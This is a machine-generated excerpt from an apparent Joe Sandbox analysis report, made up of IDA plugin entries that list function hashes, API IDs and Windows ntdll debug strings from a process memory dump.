                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  • API String ID: 48624451-232158463
                                                                  • Opcode ID: 811865322bea71eaa7a305538e5e82e756412c353462aea8d30953b7e9c8a0bf
                                                                  • Instruction ID: 75e6a69b81879ec8fa2a6a8b4f7d158a8b480c0dbc6e86d42081bcbf53334617
                                                                  • Opcode Fuzzy Hash: 811865322bea71eaa7a305538e5e82e756412c353462aea8d30953b7e9c8a0bf
                                                                  • Instruction Fuzzy Hash: D7714A72A403099FCB05CFA8CA91FAEB7B8BF18304F144165E905AB651EB34AA01CB61
                                                                  Strings
                                                                  • LdrResSearchResource Enter, xrefs: 22A7AA13
                                                                  • LdrResSearchResource Exit, xrefs: 22A7AA25
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  • API String ID: 0-4066393604
                                                                  • Opcode ID: 7a56c26c1eb88003fa9db4841d7c91e7c7a5486bb8d2791b9c922c3516d9cfbb
                                                                  • Instruction ID: f541284c320dbcab4d7fbdc8fe540124b39b9c73db6eab4cb0d47c5360fdce0a
                                                                  • Opcode Fuzzy Hash: 7a56c26c1eb88003fa9db4841d7c91e7c7a5486bb8d2791b9c922c3516d9cfbb
                                                                  • Instruction Fuzzy Hash: 9FE18072E04309AFEB11CF95CE80B9EB7B9BF58354F104526FA02EBA42D7788940CB54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `$`
                                                                  • API String ID: 0-197956300
                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction ID: 7dfb44702edf562eb87262a60f8ca7673be5caf3ea0593fd5a19e7c226b7e195
                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction Fuzzy Hash: DBC1F2322043429BDB16CF24C941B6BBBE5FFD5318F244A2DFA95CA2A1D778D505CB82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: c7442db48d2f8a0a7355a16272a8867bd1ed2bf80f0ed6a1495ea97196ece4f7
                                                                  • Instruction ID: 02733c0f4004514c6326ac671fbad2eec049793fe106e033f3f1ec5a8c1ef3e6
                                                                  • Opcode Fuzzy Hash: c7442db48d2f8a0a7355a16272a8867bd1ed2bf80f0ed6a1495ea97196ece4f7
                                                                  • Instruction Fuzzy Hash: F3614871E403099FDB15CFA8CA80BAEBBB9BB48714F104079E65AEB651D731A901CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$MUI
                                                                  • API String ID: 0-17815947
                                                                  • Opcode ID: b984e6fc2043e14424cd4b211ed558c0735eec3ca7e83b438277868fb6281878
                                                                  • Instruction ID: ab61a1532eac849702d65cb7729f42e951d508a2e8cb3134fcb947db5351c8c9
                                                                  • Opcode Fuzzy Hash: b984e6fc2043e14424cd4b211ed558c0735eec3ca7e83b438277868fb6281878
                                                                  • Instruction Fuzzy Hash: AB5106B1E4031DAEDF11CFA5CD80BEEBBBCEF58754F10052AE611A7291DA709A05CB60
                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 22A7063D
                                                                  • kLsE, xrefs: 22A70540
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 0-2547482624
                                                                  • Opcode ID: ad58c1df627508e386c4647204e828c84ed08111cdb9683216a9efdc125cf96d
                                                                  • Instruction ID: e86e5e71cc019a9bf98464df87ddc79326cbdfc42c8eb8522a865601604386e9
                                                                  • Opcode Fuzzy Hash: ad58c1df627508e386c4647204e828c84ed08111cdb9683216a9efdc125cf96d
                                                                  • Instruction Fuzzy Hash: 05518C716047429FC314DF74C6916ABB7F4BF84304F00883EEAA987A81E774E645CB9A
                                                                  Strings
                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 22AE2807
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 22AE280C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                  • API String ID: 0-2104531740
                                                                  • Opcode ID: 022f12d8fe890c969ef6146ce01bcce3d37aad5841669c72fdc6ac6642c4e712
                                                                  • Instruction ID: a124e77c2a47044e4ce1ad89933f08067dd9136872e796e307394863562a0358
                                                                  • Opcode Fuzzy Hash: 022f12d8fe890c969ef6146ce01bcce3d37aad5841669c72fdc6ac6642c4e712
                                                                  • Instruction Fuzzy Hash: 7741E236600311EBD714CF55C981E6AB3B5FFA4B14F20816EE9499BA40D7B0DD52CBA0
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 22A7A2FB
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 22A7A309
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  • API String ID: 0-2876891731
                                                                  • Opcode ID: a7a0fea6c8bb52272cacb3a91d20290de1367615a05a128fa3ffb703e27b5db7
                                                                  • Instruction ID: fcfbb0811e7d6284c01e26999185cfa37801fe393a0ba17980eb39d365778740
                                                                  • Opcode Fuzzy Hash: a7a0fea6c8bb52272cacb3a91d20290de1367615a05a128fa3ffb703e27b5db7
                                                                  • Instruction Fuzzy Hash: 7A41E139A04749EBDB01CF69CA80B5E77B4FF84704F1081E5EA15DBA92E7B9DA00CB45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  • Opcode ID: 61b14415b43e787ffe457cc33bef5536af7ad17c19fc5f622d91524f326bcfd3
                                                                  • Instruction ID: ba0c9c2ad7cbff4a6a1af0c7288bb4e46a688b8acdf9d00038c606afcd4af44d
                                                                  • Opcode Fuzzy Hash: 61b14415b43e787ffe457cc33bef5536af7ad17c19fc5f622d91524f326bcfd3
                                                                  • Instruction Fuzzy Hash: 3301DCB2640740AFE311CF28CE45F26B7F8EB64719F00893AA658C7A91E738D804CB46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: 3356ba3437bf7bec12d2bfabec1c5a6e1bfeb7b67bffdf5c0df707c1b5500c94
                                                                  • Instruction ID: 4bb894d76d607be235061b2496075ad0412536a6d9f5a709a3a8a3d4b89d7590
                                                                  • Opcode Fuzzy Hash: 3356ba3437bf7bec12d2bfabec1c5a6e1bfeb7b67bffdf5c0df707c1b5500c94
                                                                  • Instruction Fuzzy Hash: 7C827E75E007189FEB14CFA9CA80BADB7B2BF48354F108169E919ABB91D7309D41CF58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 94769da5e5c209fccdf361bf2cd62ccdee30a2b195b62f768074301af9dc9c8b
                                                                  • Instruction ID: 502ff1b1780dc95c4de0c238f0e5b32125abb7e6e323f064914608c244b83af3
                                                                  • Opcode Fuzzy Hash: 94769da5e5c209fccdf361bf2cd62ccdee30a2b195b62f768074301af9dc9c8b
                                                                  • Instruction Fuzzy Hash: E6916DB2A41319AFDB11CB99CE85FAE7BB9EF18B50F100065F710BB590D775A904CBA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: a0a1106f694e04cef5701b03fde6ab997070e4121f50c717d9c7a616ef109ddf
                                                                  • Instruction ID: 84e72d66e2f3b836afe8e8bfe1258051c9d7aa2d750119a08b9983ababef6894
                                                                  • Opcode Fuzzy Hash: a0a1106f694e04cef5701b03fde6ab997070e4121f50c717d9c7a616ef109ddf
                                                                  • Instruction Fuzzy Hash: FD91EF76A41748BBDB16CFA0DE90F9FBBB9EF55740F100029F600A7660DBB89901CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: b5c49c6616a04c367403d6052406eee708d45488c7a6046fd8482bc87ccf47b6
                                                                  • Instruction ID: 00742eed6beb3b61ab17adb2aadb142438c227d35d42ea15cc9aad36eb0de52c
                                                                  • Opcode Fuzzy Hash: b5c49c6616a04c367403d6052406eee708d45488c7a6046fd8482bc87ccf47b6
                                                                  • Instruction Fuzzy Hash: 36717E75E0030ACFDB18CF9DC691A9DBBB1BF48B04F10853AE81AA7A42D7359942CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .mui
                                                                  • API String ID: 0-1199573805
                                                                  • Opcode ID: 59ea111863d4f4469b5ebc4a5d6a9b459c22301f119f27e0493c5a3fa15ddc0f
                                                                  • Instruction ID: dbb137009ef6b13d8968d9491b2b7a9868fde79145dace4c9280616a52e681ea
                                                                  • Opcode Fuzzy Hash: 59ea111863d4f4469b5ebc4a5d6a9b459c22301f119f27e0493c5a3fa15ddc0f
                                                                  • Instruction Fuzzy Hash: D1519172E11369DBDF00CF99D980BAEB7B4FF15B54F05416AEA21BB250DB348901CBA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  • Opcode ID: 4992c26836ecc6bc75790a0d8e30ea104b9f7d3214e8a72ecb71563990c6f763
                                                                  • Instruction ID: 82ce407496f1d6d043316c6f56602ac01b771ebcdc7275deeedeebb0e0585125
                                                                  • Opcode Fuzzy Hash: 4992c26836ecc6bc75790a0d8e30ea104b9f7d3214e8a72ecb71563990c6f763
                                                                  • Instruction Fuzzy Hash: 09418F72609352DBD711DB75CA80B6BB7E8BF88708F400A29FA94E7940EA34D904C797
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: e475cf5d05e6371c98f2a3d95a62a996fcb30816c8974c4b279c43e55302026b
                                                                  • Instruction ID: f49edcf838b447f9cffd8d2d4650311b13a1c8136fca77c172842a9d840e68a7
                                                                  • Opcode Fuzzy Hash: e475cf5d05e6371c98f2a3d95a62a996fcb30816c8974c4b279c43e55302026b
                                                                  • Instruction Fuzzy Hash: 5F4171B1D4032CAADB228A60CD80FDE777DAF54714F0045E5AB19AB540DB709E89CFA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: bc545efe60705a8d5afb3b09a472398a763212fe3eadaef7fea1b94906cec020
                                                                  • Instruction ID: 5c24907fa2ab029420c962636d04a5f8f60dacd8525061deffe3501114557740
                                                                  • Opcode Fuzzy Hash: bc545efe60705a8d5afb3b09a472398a763212fe3eadaef7fea1b94906cec020
                                                                  • Instruction Fuzzy Hash: 58312631A007699BDB23CF79C950BAE7BB8EF14708F104068E940AB292DB79DA45CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: 92c6497c20877ac864385c0cfa1ddebde7fd83e6d68773a6ce026164942f9cd5
                                                                  • Instruction ID: 698c680ca32886c800035999cc292e4876469b54a3f44b87d2aa43fe4ea03379
                                                                  • Opcode Fuzzy Hash: 92c6497c20877ac864385c0cfa1ddebde7fd83e6d68773a6ce026164942f9cd5
                                                                  • Instruction Fuzzy Hash: D831F676901715AFDB06DA58C991E6BB776FF40710F014179EA1AA7650D7309E01C7D0
                                                                  Strings
                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 22B0AF2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                  • API String ID: 0-1911121157
                                                                  • Opcode ID: 684534a5ec00402544861495cf778b5ffd36a71cb3a7e66859117d69a8314df5
                                                                  • Instruction ID: cbe119cdc7c29deb4af542d4544e90958a086b908375e223daefd9964c17e895
                                                                  • Opcode Fuzzy Hash: 684534a5ec00402544861495cf778b5ffd36a71cb3a7e66859117d69a8314df5
                                                                  • Instruction Fuzzy Hash: 5831D1B2A40744AFD702DB64C941F6ABBB9FB44B14F108A65FA05E7695D738A900CB90
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 22AF895E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Opcode ID: 572fd9df2560671b3e0811dee739bc9e1b8bd56410fa695dff7baf7ab7870685
                                                                  • Instruction ID: 87dca0ba25d6f325cf794d860c44e33b84d943a367d53bfaf86ee034ab640c09
                                                                  • Opcode Fuzzy Hash: 572fd9df2560671b3e0811dee739bc9e1b8bd56410fa695dff7baf7ab7870685
                                                                  • Instruction Fuzzy Hash: 5101D4323403009FD7258A51CEC8A7A7B65BF95394B601428FE8117C55CB2A6890C796
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 564249e644d5c0331be641a25b610db3a87a8e966f306aa2d7c720a93a8c89f9
                                                                  • Instruction ID: c8cc08a609928152772e037b1417d023a011064b586be1778d09f645239e90e7
                                                                  • Opcode Fuzzy Hash: 564249e644d5c0331be641a25b610db3a87a8e966f306aa2d7c720a93a8c89f9
                                                                  • Instruction Fuzzy Hash: A142CC72A083619FD715CF64CA90B6BB7E9FF88344F04492DFA8197260D6B0E945CF92
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 389aeda128e32fadad751cdfa3ba3a8c3d1aa6fe7b180fd82a104cc96c171f0b
                                                                  • Instruction ID: e03acce226681ff012877204e1df31a9b74fc24b18d285b97d6ec25aba9e1d5b
                                                                  • Opcode Fuzzy Hash: 389aeda128e32fadad751cdfa3ba3a8c3d1aa6fe7b180fd82a104cc96c171f0b
                                                                  • Instruction Fuzzy Hash: 16425B71A003198FDF15CF69C981BADBBF5FF88304F558199E988AB252DB349A81CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fac8104688f860ad382748ea7b0797f43d4cefa9e386006fb91497d88d682f02
                                                                  • Instruction ID: 336a9111b00293a9edaefa52d888a3ad1126c8a339064e85a291280ed0087803
                                                                  • Opcode Fuzzy Hash: fac8104688f860ad382748ea7b0797f43d4cefa9e386006fb91497d88d682f02
                                                                  • Instruction Fuzzy Hash: B2323275A007558FDB14CF69CA80BBEBBF2BF88B04F20421DE5859BA85D735A941CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1323a24a6422ca8e84fcb92afe73e09dcdde8447a66b367e9d5b598a3e33ceaf
                                                                  • Instruction ID: f22cdd4fd289491f314dfd78e72d99afe9aa2df4f488db35f5b6f81dbf341b32
                                                                  • Opcode Fuzzy Hash: 1323a24a6422ca8e84fcb92afe73e09dcdde8447a66b367e9d5b598a3e33ceaf
                                                                  • Instruction Fuzzy Hash: 3022BB702047908BD715CF29C290772B7F1EF46348F14859AEA968B2A6E73DF592CB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44d6e130ed72085888dbdc68e94a7847c11e2bd79eb8ff85e37302bbfeacefa6
                                                                  • Instruction ID: efab92e906222116d265808dd5b78f2662ac84f5603cfa979fff716523a78a5f
                                                                  • Opcode Fuzzy Hash: 44d6e130ed72085888dbdc68e94a7847c11e2bd79eb8ff85e37302bbfeacefa6
                                                                  • Instruction Fuzzy Hash: B8326871A01705CFCB14CFA9C580B9EB7F1FF48704F108669E955ABAA2DB34E941CB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                  • Instruction ID: 5c7c255ac31c9fa2eaa4a4b620df4de2a48dcfbf8566d73eb7e0689be9799a8a
                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                  • Instruction Fuzzy Hash: 2CF17F75E0131A9FDB05CF9AC680BAEBBF5BF48714F048529E904ABB50E734D941CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e2b96093cc1af1d59ca040976168c65ef554f99fe1fd73ebc448f672d569570
                                                                  • Instruction ID: 3c4d486269839d91d90cdb4429a8d07975e4744e81562a7017164cedde31a348
                                                                  • Opcode Fuzzy Hash: 7e2b96093cc1af1d59ca040976168c65ef554f99fe1fd73ebc448f672d569570
                                                                  • Instruction Fuzzy Hash: C2D1E071E007099BDF06CF59C841BAEBBF1EF88314F948269D955A7241EB39DB05CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b7330a5245182aef0fc7db8a8539a3d38908e4afcca9f05197000490955706c
                                                                  • Instruction ID: aa2855a76060b84079959540830b356428374394386d6d4c4c3471cc911fff53
                                                                  • Opcode Fuzzy Hash: 2b7330a5245182aef0fc7db8a8539a3d38908e4afcca9f05197000490955706c
                                                                  • Instruction Fuzzy Hash: 52E17971608341CFC308CF28C690B5ABBF0BF89748F048A6DE9998B751DB31E905CB96
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b74dd4f5848eca27f108d2e86fcf2ead6aa41788903bdff63b0fed16c79f82ab
                                                                  • Instruction ID: 8ba89fa566f909ecf2c22a775b6df34f1a3d91a0b052c546b7c3146481effcbe
                                                                  • Opcode Fuzzy Hash: b74dd4f5848eca27f108d2e86fcf2ead6aa41788903bdff63b0fed16c79f82ab
                                                                  • Instruction Fuzzy Hash: 2ED1A071B0170ADFDF04CF64CA90EBA77A9BF54308F444629EA15DBA80EB35DA49CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                  • Instruction ID: 4f6a1a3c9b73da37f7724f97a4ac8907c8db06f7a9fa06642c9408510a8bfca2
                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                  • Instruction Fuzzy Hash: B4B14175B007049FDF14CB95CA80EABB7B9BF84344FA04459BA52A7A94DB3AED05CB10
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction ID: 11fbb1406b29c1836b527964878f67de985e6f0230b3e3fc9874136f64dfc0cd
                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction Fuzzy Hash: 82B13632700745AFDB15CB68C981BAEBBF6BF48304F1442A5E651DBA91DB30EA41CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53c61551e932a98e77b1507ed83e679e6b8730c7c8268de294a1cfb5768f9c97
                                                                  • Instruction ID: 753412513cb54e881349aa10139e7ca20554cd6e71de32fac0924bbd3bae7bd1
                                                                  • Opcode Fuzzy Hash: 53c61551e932a98e77b1507ed83e679e6b8730c7c8268de294a1cfb5768f9c97
                                                                  • Instruction Fuzzy Hash: DCC168756083408FD760CF15C594BABB7F5BF98308F40496DE98987691EB74EA08CF92
                                                                  Memory Dump Source
